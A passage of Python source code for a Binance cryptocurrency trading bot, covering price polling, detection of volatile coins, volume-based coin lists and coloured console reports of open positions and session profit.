By using this program you accept all liabilities,
and that no claims can be made against the developers,
or others connected with the program.
See requirements.txt for versions of modules needed
Notes:
- Requires Python version 3.9.x to run
"""
# use for environment variables
import os
# use if needed to pass args to external modules
import sys
#for clear screen console
from os import system, name
# used for math functions
import math
# used to create threads & dynamic loading of modules
import threading
import multiprocessing
import importlib
# used for directory handling
import glob
#discord needs import request
import requests
# Needed for colorful console output Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API / websockets / Exception handling
from binance.client import Client
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
from requests.exceptions import ReadTimeout, ConnectionError
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
#print output tables
from prettytable import PrettyTable, from_html_one
#from pretty_html_table import build_table
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key,
load_discord_creds
)
# for colourful logging to the console
class txcolors:
BUY = '\033[92m'
WARNING = '\033[93m'
SELL_LOSS = '\033[94m'
SELL_PROFIT = '\033[32m'
DIM = '\033[2m\033[35m'
BORDER = '\033[33m'
DEFAULT = '\033[39m'
BOT_LOSSES = '\033[91m'
BOT_WINS = '\033[92m'
RED = '\033[91m'
#Blue = '\033[94m'
#Cyan = '\033[96m'
MENUOPTION = '\033[97m'
#Magenta = '\033[95m'
#Grey = '\033[90m'
#Black = '\033[90m'
# tracks profit/loss each session
global session_profit_incfees_perc, session_profit_incfees_total, session_tpsl_override_msg, is_bot_running, session_USDT_EARNED, last_msg_discord_balance_date, session_USDT_EARNED_TODAY, parsed_creds, TUP,PUP, TDOWN, PDOWN, TNEUTRAL, PNEUTRAL, renewlist, DISABLE_TIMESTAMPS, signalthreads, VOLATILE_VOLUME_LIST, FLAG_PAUSE, coins_up,coins_down,coins_unchanged, SHOW_TABLE_COINS_BOUGHT, USED_BNB_IN_SESSION, PAUSEBOT_MANUAL, sell_specific_coin
global historic_profit_incfees_perc, historic_profit_incfees_total, trade_wins, trade_losses, sell_all_coins, bot_started_datetime
last_price_global = 0
session_profit_incfees_perc = 0
session_profit_incfees_total = 0
session_tpsl_override_msg = ""
session_USDT_EARNED = 0
session_USDT_EARNED_TODAY = 0
last_msg_discord_balance_date = 0
coins_up = 0
coins_down = 0
coins_unchanged = 0
is_bot_running = True
renewlist = 0
FLAG_PAUSE = True
USED_BNB_IN_SESSION = 0
PAUSEBOT_MANUAL = False
sell_specific_coin = False
sell_all_coins = False
try:
historic_profit_incfees_perc
except NameError:
historic_profit_incfees_perc = 0 # or some other default value.
try:
historic_profit_incfees_total
except NameError:
historic_profit_incfees_total = 0 # or some other default value.
try:
trade_wins
except NameError:
trade_wins = 0 # or some other default value.
try:
trade_losses
except NameError:
trade_losses = 0 # or some other default value.
bot_started_datetime = ""
def is_fiat():
# check if we are using a fiat as a base currency
global hsp_head
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
#list below is in the order that Binance displays them, apologies for not using ASC order
fiats = ['USDT', 'BUSD', 'AUD', 'BRL', 'EUR', 'GBP', 'RUB', 'TRY', 'TUSD', 'USDC', 'PAX', 'BIDR', 'DAI', 'IDRT', 'UAH', 'NGN', 'VAI', 'BVND', 'USDP']
if PAIR_WITH in fiats:
return True
else:
return False
def decimals():
# set number of decimals for reporting fractions
if is_fiat():
return 4
else:
return 8
def get_price(add_to_historical=True):
'''Return the current price for all coins on binance'''
global historical_prices, hsp_head
initial_price = {}
prices = client.get_all_tickers()
renew_list()
try:
for coin in prices:
if CUSTOM_LIST:
# intickers = False
# inex_pairs = False
for item1 in tickers:
if item1 + PAIR_WITH == coin['symbol'] and coin['symbol'].replace(PAIR_WITH, "") not in EX_PAIRS:
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
# intickers = True
# break
# for item2 in EX_PAIRS:
# if item2 + PAIR_WITH == coin['symbol']:
# inex_pairs = True
# break
# if intickers == True and inex_pairs == False:
# initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
# if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in EX_PAIRS): #and all(item not in coin['symbol'] for item in FIATS)
# initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
#print("CUSTOM_LIST", coin['symbol'])
else:
if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in EX_PAIRS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
if add_to_historical:
hsp_head += 1
if hsp_head == RECHECK_INTERVAL:
hsp_head = 0
historical_prices[hsp_head] = initial_price
except Exception as e:
write_log(f'{"get_price"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
#except KeyboardInterrupt as ki:
#pass
return initial_price
#use function of the OlorinSledge
def wait_for_price():
try:
'''calls the initial price and ensures the correct amount of time has passed
before reading the current price again'''
global historical_prices, hsp_head, volatility_cooloff, coins_up,coins_down,coins_unchanged
volatile_coins = {}
externals = {}
coins_up = 0
coins_down = 0
coins_unchanged = 0
pause_bot()
# get first element from the dictionary
firstcoin = next(iter(historical_prices[hsp_head]))
#BBif historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
if historical_prices[hsp_head][firstcoin]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
# sleep for exactly the amount of time required
#BBtime.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds())
time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head][firstcoin]['time'])).total_seconds())
# retrieve latest prices
renew_list()
last_price = get_price()
# Moved to the end of this method
# balance_report(last_price)
# calculate the difference in prices
for coin in historical_prices[hsp_head]:
# minimum and maximum prices over time period
min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))
threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100
# each coin with higher gains than our CHANGE_IN_PRICE is added to the volatile_coins dict if less than TRADE_SLOTS is not reached.
if threshold_check > CHANGE_IN_PRICE:
coins_up +=1
if coin not in volatility_cooloff:
volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)
# volatility_cooloff[coin] = datetime.now() - timedelta(minutes=COOLOFF_PERIOD)
# only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
#if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=COOLOFF_PERIOD):
volatility_cooloff[coin] = datetime.now()
if len(coins_bought) + len(volatile_coins) < TRADE_SLOTS or TRADE_SLOTS == 0:
volatile_coins[coin] = round(threshold_check, 3)
print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, purchasing ${TRADE_TOTAL} {PAIR_WITH} of {coin}!')
else:
print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are using all available trade slots!{txcolors.DEFAULT}')
#else:
#if len(coins_bought) == TRADE_SLOTS:
# print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are using all available trade slots!{txcolors.DEFAULT}')
#else:
# print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but failed cool off period of {COOLOFF_PERIOD} minutes! Curr COP is {volatility_cooloff[coin] + timedelta(minutes=COOLOFF_PERIOD)}{txcolors.DEFAULT}')
elif threshold_check < CHANGE_IN_PRICE:
coins_down +=1
else:
coins_unchanged +=1
# Disabled until fix
#print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}')
# Here goes new code for external signalling
externals = buy_external_signals()
exnumber = 0
for excoin in externals:
if excoin not in volatile_coins and excoin not in coins_bought and (len(coins_bought) + len(volatile_coins)) < TRADE_SLOTS:
#(len(coins_bought) + exnumber + len(volatile_coins)) < TRADE_SLOTS:
volatile_coins[excoin] = 1
exnumber +=1
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}External signal received on {excoin}, purchasing ${TRADE_TOTAL} {PAIR_WITH} value of {excoin}!')
with open(EXTERNAL_COINS,'a+') as f:
f.write(excoin + '\n')
balance_report(last_price)
except Exception as e:
write_log(f'{"wait_for_price"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
def get_volume_list():
try:
global COINS_MAX_VOLUME, COINS_MIN_VOLUME
VOLATILE_VOLUME = "volatile_volume_" + str(date.today()) + ".txt"
most_volume_coins = {}
tickers_all = []
# os.remove(VOLATILE_VOLUME)
#try:
#if os.path.exists("tickers_all.txt") == True:
#tickers_all=[line.strip() for line in open("tickers_all.txt")]
#else:
#VOLATILE_VOLUME = ""
prices = client.get_all_tickers()
for coin in prices:
if coin['symbol'] == coin['symbol'].replace(PAIR_WITH, "") + PAIR_WITH:
tickers_all.append(coin['symbol'].replace(PAIR_WITH, ""))
c = 0
if os.path.exists(VOLATILE_VOLUME) == False:
load_settings()
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Creating volatile list, wait a moment...')
if COINS_MAX_VOLUME.isnumeric() == False and COINS_MIN_VOLUME.isnumeric() == False:
infocoinMax = client.get_ticker(symbol=COINS_MAX_VOLUME + PAIR_WITH)
infocoinMin = client.get_ticker(symbol=COINS_MIN_VOLUME + PAIR_WITH)
COINS_MAX_VOLUME = math.ceil(float(infocoinMax['quoteVolume']))
COINS_MIN_VOLUME = round(float(infocoinMin['quoteVolume']))
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}COINS_MAX_VOLUME {COINS_MAX_VOLUME} and COINS_MIN_VOLUME {COINS_MIN_VOLUME} were set from specific currencies...')
for coin in tickers_all:
#try:
infocoin = client.get_ticker(symbol= coin + PAIR_WITH)
volumecoin = float(infocoin['quoteVolume']) #/ 1000000
if volumecoin <= COINS_MAX_VOLUME and volumecoin >= COINS_MIN_VOLUME and coin not in EX_PAIRS and coin not in most_volume_coins:
most_volume_coins.update({coin : volumecoin})
c = c + 1
# except Exception as e:
# print("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
# continue
if c <= 0:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Cannot continue because there are no coins in the selected range, change the settings and start the bot again...')
sys.exit()
sortedVolumeList = sorted(most_volume_coins.items(), key=lambda x: x[1], reverse=True)
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Saving {str(c)} coins to {VOLATILE_VOLUME} ...')
for coin in sortedVolumeList:
with open(VOLATILE_VOLUME,'a+') as f:
f.write(coin[0] + '\n')
else:
if ALWAYS_OVERWRITE == False:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}There is already a recently created list, if you want to create a new list, stop the bot and delete the previous one.')
print(f'{txcolors.WARNING}REMEMBER: {txcolors.DEFAULT}if you create a new list when continuing a previous session, it may not coincide with the previous one and give errors...')
except Exception as e:
write_log(f'{"get_volume_list"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
write_log("COIN_ERROR: ", coin + PAIR_WITH)
exit(1)
return VOLATILE_VOLUME
def print_table_coins_bought():
try:
if SHOW_TABLE_COINS_BOUGHT:
if len(coins_bought) > 0:
my_table = PrettyTable()
my_table.format = True
my_table.border = True
my_table.align = "c"
my_table.valign = "m"
my_table.field_names = ["Symbol", "Volume", "Bought At", "Now At", "TP %", "SL %", "Change %", "Profit $", "Time Held"]
last_price = get_price(False)
for coin in list(coins_bought):
LastPriceT = round(float(last_price[coin]['price']),3)
sellFeeT = (LastPriceT * (TRADING_FEE/100))
LastPriceLessFeesT = round((LastPriceT - sellFeeT), 2)
BuyPriceT = round(float(coins_bought[coin]['bought_at']),3)
buyFeeT = (BuyPriceT * (TRADING_FEE/100))
BuyPricePlusFeesT = BuyPriceT + buyFeeT
#ProfitAfterFees = round((LastPriceLessFees - BuyPricePlusFees), 2)
#PriceChangeIncFees_Perc = round(float(((LastPriceLessFees - BuyPricePlusFees) / BuyPricePlusFees) * 100), 3)
PriceChangeIncFees_PercT = round(float(((LastPriceT - BuyPricePlusFeesT) / BuyPricePlusFeesT) * 100), 3)
PriceChange_PercT = round(float(((LastPriceT - BuyPriceT) / BuyPriceT) * 100), 3)
#if PriceChangeIncFees_Perc == -100: PriceChangeIncFees_Perc = 0
time_held = timedelta(seconds=datetime.now().timestamp()-int(str(coins_bought[coin]['timestamp'])[:10]))
#if IGNORE_FEE:
#my_table.add_row([f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{coin.replace(PAIR_WITH,'')}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{coins_bought[coin]['volume']:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{BuyPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{LastPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{coins_bought[coin]['take_profit']:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{coins_bought[coin]['stop_loss']:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{PriceChangeIncFees_Perc:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{str(time_held).split('.')[0]}{txcolors.DEFAULT}"])
my_table.add_row([f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{coin.replace(PAIR_WITH,'')}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{coins_bought[coin]['volume']:.5f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{BuyPriceT:.3f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{LastPriceT:.3f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{coins_bought[coin]['take_profit']:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{coins_bought[coin]['stop_loss']:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{PriceChangeIncFees_PercT:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_PercT)/100:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{str(time_held).split('.')[0]}{txcolors.DEFAULT}"])
my_table.sortby = SORT_TABLE_BY
my_table.reversesort = REVERSE_SORT
print(my_table)
print("\n")
except Exception as e:
write_log(f'{"print_table_coins_bought"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
def clear():
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
def balance_report(last_price):
try:
global trade_wins, trade_losses, session_profit_incfees_perc, session_profit_incfees_total, last_price_global, session_USDT_EARNED_TODAY, session_USDT_EARNED, TUP, TDOWN, TNEUTRAL
unrealised_session_profit_incfees_perc = 0
unrealised_session_profit_incfees_total = 0
msg1 = ""
msg2 = ""
BUDGET = TRADE_SLOTS * TRADE_TOTAL
exposure_calcuated = 0
for coin in list(coins_bought):
LastPriceBR = float(last_price[coin]['price'])
sellFeeBR = (LastPriceBR * (TRADING_FEE/100))
BuyPriceBR = float(coins_bought[coin]['bought_at'])
buyFeeBR = (BuyPriceBR * (TRADING_FEE/100))
exposure_calcuated = exposure_calcuated + round(float(coins_bought[coin]['bought_at']) * float(coins_bought[coin]['volume']),0)
#PriceChangeIncFees_Perc = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) / (BuyPrice+buyFee) * 100)
#PriceChangeIncFees_Total = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
PriceChangeIncFees_TotalBR = float(((LastPriceBR-sellFeeBR) - (BuyPriceBR+buyFeeBR)) * coins_bought[coin]['volume'])
# unrealised_session_profit_incfees_perc = float(unrealised_session_profit_incfees_perc + PriceChangeIncFees_Perc)
unrealised_session_profit_incfees_total = float(unrealised_session_profit_incfees_total + PriceChangeIncFees_TotalBR)
unrealised_session_profit_incfees_perc = (unrealised_session_profit_incfees_total / BUDGET) * 100
DECIMALS = int(decimals())
# CURRENT_EXPOSURE = round((TRADE_TOTAL * len(coins_bought)), DECIMALS)
CURRENT_EXPOSURE = round(exposure_calcuated, 0)
INVESTMENT_TOTAL = round((TRADE_TOTAL * TRADE_SLOTS), DECIMALS)
# truncating some of the above values to the correct decimal places before printing
WIN_LOSS_PERCENT = 0
if (trade_wins > 0) and (trade_losses > 0):
WIN_LOSS_PERCENT = round((trade_wins / (trade_wins+trade_losses)) * 100, 2)
if (trade_wins > 0) and (trade_losses == 0):
WIN_LOSS_PERCENT = 100
strplus = "+"
if STATIC_MAIN_INFO == True: clear()
if SCREEN_MODE < 2: print(f'')
if SCREEN_MODE == 2: print(f'')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}STARTED : {txcolors.SELL_LOSS}{str(bot_started_datetime).split(".")[0]}{txcolors.DEFAULT} | Running for: {txcolors.SELL_LOSS}{str(datetime.now() - bot_started_datetime).split(".")[0]} {txcolors.BORDER}{"+".rjust(15)}{txcolors.DEFAULT}')
if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}STARTED: {txcolors.SELL_LOSS}{str(bot_started_datetime).split(".")[0]}{txcolors.DEFAULT} | Running for: {txcolors.SELL_LOSS}{str(datetime.now() - bot_started_datetime).split(".")[0]}{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}CURRENT HOLDS : {txcolors.SELL_LOSS}{str(len(coins_bought)).zfill(4)}{txcolors.DEFAULT}/{txcolors.SELL_LOSS}{str(TRADE_SLOTS).zfill(4)} {"{0:>5}".format(int(CURRENT_EXPOSURE))}{txcolors.DEFAULT}/{txcolors.SELL_LOSS}{"{0:<5}".format(int(INVESTMENT_TOTAL))} {txcolors.DEFAULT}{PAIR_WITH}{txcolors.BORDER}{"+".rjust(32)}{txcolors.DEFAULT}')
if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}CURRENT HOLDS: {txcolors.SELL_LOSS}{str(len(coins_bought))}{txcolors.DEFAULT}/{txcolors.SELL_LOSS}{str(TRADE_SLOTS)} {int(CURRENT_EXPOSURE)}{txcolors.DEFAULT}/{txcolors.SELL_LOSS}{int(INVESTMENT_TOTAL)} {txcolors.DEFAULT}{PAIR_WITH}{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}BUYING PAUSE : {txcolors.SELL_LOSS}{"{0:<5}".format(str(bot_paused))}{txcolors.BORDER}{"+".rjust(53)}{txcolors.DEFAULT}')
if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}BUYING PAUSE: {txcolors.SELL_LOSS}{str(bot_paused)}{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}WINS / LOSSSES : {txcolors.BOT_WINS}{str(trade_wins).zfill(5).ljust(5)}{txcolors.DEFAULT}/{txcolors.BOT_LOSSES}{str(trade_losses).zfill(5).ljust(5)} {txcolors.DEFAULT}Win%: {txcolors.SELL_LOSS}{str(int(float(WIN_LOSS_PERCENT))).zfill(3)}%{txcolors.BORDER}{"+".rjust(36)}{txcolors.DEFAULT}')
if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}WINS/LOSSSES: {txcolors.BOT_WINS}{str(trade_wins)}{txcolors.DEFAULT}/{txcolors.BOT_LOSSES}{str(trade_losses)} {txcolors.DEFAULT}Win%: {txcolors.SELL_PROFIT if WIN_LOSS_PERCENT > 0. else txcolors.BOT_LOSSES}{float(WIN_LOSS_PERCENT):g}%{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}PENDING : {txcolors.SELL_PROFIT if unrealised_session_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{str(round(unrealised_session_profit_incfees_perc,3)).center(8)}% Est:${str(round(unrealised_session_profit_incfees_total,3)).center(8)} {PAIR_WITH.center(6)}{txcolors.DEFAULT}{txcolors.BORDER}{"+".rjust(36)}{txcolors.DEFAULT}')
#if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}PENDING: {txcolors.SELL_PROFIT if unrealised_session_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{str(round(unrealised_session_profit_incfees_perc,3))}% Est:${str(round(unrealised_session_profit_incfees_total,3))} {PAIR_WITH}{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}COIN STATUS : {txcolors.SELL_PROFIT}Up {coins_up}, {txcolors.SELL_LOSS}Down: {coins_down}{txcolors.DEFAULT}, Unchanged: {coins_unchanged}{txcolors.BORDER}{"+".rjust(35)}')
#if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}COIN STATUS: {txcolors.SELL_PROFIT}Up {coins_up}, {txcolors.SELL_LOSS}Down: {coins_down}{txcolors.DEFAULT}, Unchanged: {coins_unchanged}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+')
#if SCREEN_MODE < 2: print(f'')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}TOTAL : {txcolors.SELL_PROFIT if (session_profit_incfees_perc + unrealised_session_profit_incfees_perc) > 0. else txcolors.SELL_LOSS}{str(round(session_profit_incfees_perc + unrealised_session_profit_incfees_perc,3)).center(8)}% Est:${str(round(session_profit_incfees_total+unrealised_session_profit_incfees_total,3)).center(8)} {PAIR_WITH.center(6)}{txcolors.DEFAULT}{txcolors.BORDER}{"+".rjust(36)}{txcolors.DEFAULT}')
#if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}TOTAL: {txcolors.SELL_PROFIT if (session_profit_incfees_perc + unrealised_session_profit_incfees_perc) > 0. else txcolors.SELL_LOSS}{str(round(session_profit_incfees_perc + unrealised_session_profit_incfees_perc,3))}% Est:${str(round(session_profit_incfees_total+unrealised_session_profit_incfees_total,3))} {PAIR_WITH}{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}BNB USED : {txcolors.SELL_PROFIT} {"{0:>5}".format(str(format(float(USED_BNB_IN_SESSION), ".8f")))} {txcolors.DEFAULT}')
#if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}BNB USED: {txcolors.SELL_PROFIT}{str(format(float(USED_BNB_IN_SESSION), ".6f"))} {txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}EARNED : {txcolors.SELL_PROFIT if session_USDT_EARNED > 0. else txcolors.BOT_LOSSES}{"{0:>5}".format(str(format(float(session_USDT_EARNED), ".14f")))} {txcolors.DEFAULT}{PAIR_WITH.center(6)} | {txcolors.SELL_PROFIT if (session_USDT_EARNED * 100)/INVESTMENT_TOTAL > 0. else txcolors.BOT_LOSSES}{round((session_USDT_EARNED * 100)/INVESTMENT_TOTAL, 3)}%{txcolors.BORDER}{"+".rjust(33)}{txcolors.DEFAULT}')
if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}EARNED: {txcolors.SELL_PROFIT if session_USDT_EARNED > 0. else txcolors.BOT_LOSSES}{str(format(float(session_USDT_EARNED), ".14f"))} {txcolors.DEFAULT}{PAIR_WITH} | Profit%: {txcolors.SELL_PROFIT if (session_USDT_EARNED * 100)/INVESTMENT_TOTAL > 0. else txcolors.BOT_LOSSES}{round((session_USDT_EARNED * 100)/INVESTMENT_TOTAL,3)}%{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}BOT PROFIT : {txcolors.SELL_PROFIT if historic_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{historic_profit_incfees_perc:.4f}% Est: ${historic_profit_incfees_total:.4f} {PAIR_WITH.center(6)}{txcolors.BORDER}{"+".rjust(35)}{txcolors.DEFAULT}')
#if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}BOT PROFIT: {txcolors.SELL_PROFIT if historic_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{historic_profit_incfees_perc:.4f}% Est: ${historic_profit_incfees_total:.4f} {PAIR_WITH}{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
print(f'')
print_table_coins_bought()
#improving reporting messages
msg1 = str(datetime.now()) + "\n"
msg2 = " STARTED : " + str(bot_started_datetime) + "\n"
msg2 = msg2 + " RUNNING FOR : " + str(datetime.now() - bot_started_datetime) + "\n"
msg2 = msg2 + " TEST_MODE : " + str(TEST_MODE) + "\n"
msg2 = msg2 + " CURRENT HOLDS : " + str(len(coins_bought)/TRADE_SLOTS) + "(" + str(float(CURRENT_EXPOSURE)/float(INVESTMENT_TOTAL)) + PAIR_WITH + ")" + "\n"
msg2 = msg2 + " WIN : " + str(trade_wins) + "\n"
msg2 = msg2 + " LOST : " + str(trade_losses) + "\n"
msg2 = msg2 + " BUYING PAUSED : " + str(bot_paused) + "\n"
msg2 = msg2 + PAIR_WITH + " EARNED : " + str(session_USDT_EARNED) + "\n"
if (datetime.now() - bot_started_datetime) > timedelta(1):
session_USDT_EARNED_TODAY = session_USDT_EARNED_TODAY + session_USDT_EARNED
msg2 = msg2 + PAIR_WITH + " EARNED TODAY: " + str(session_USDT_EARNED_TODAY)
session_USDT_EARNED_TODAY = 0
#msg1 = str(datetime.now())
#msg2 = " | " + str(len(coins_bought)) + "/" + str(TRADE_SLOTS) + " | PBOT: " + str(bot_paused)
#msg2 = msg2 + ' SPR%: ' + str(round(session_profit_incfees_perc,2)) + ' SPR$: ' + str(round(session_profit_incfees_total,4))
#msg2 = msg2 + ' SPU%: ' + str(round(unrealised_session_profit_incfees_perc,2)) + ' SPU$: ' + str(round(unrealised_session_profit_incfees_total,4))
#msg2 = msg2 + ' SPT%: ' + str(round(session_profit_incfees_perc + unrealised_session_profit_incfees_perc,2)) + ' SPT$: ' + str(round(session_profit_incfees_total+unrealised_session_profit_incfees_total,4))
#msg2 = msg2 + ' ATP%: ' + str(round(historic_profit_incfees_perc,2)) + ' ATP$: ' + str(round(historic_profit_incfees_total,4))
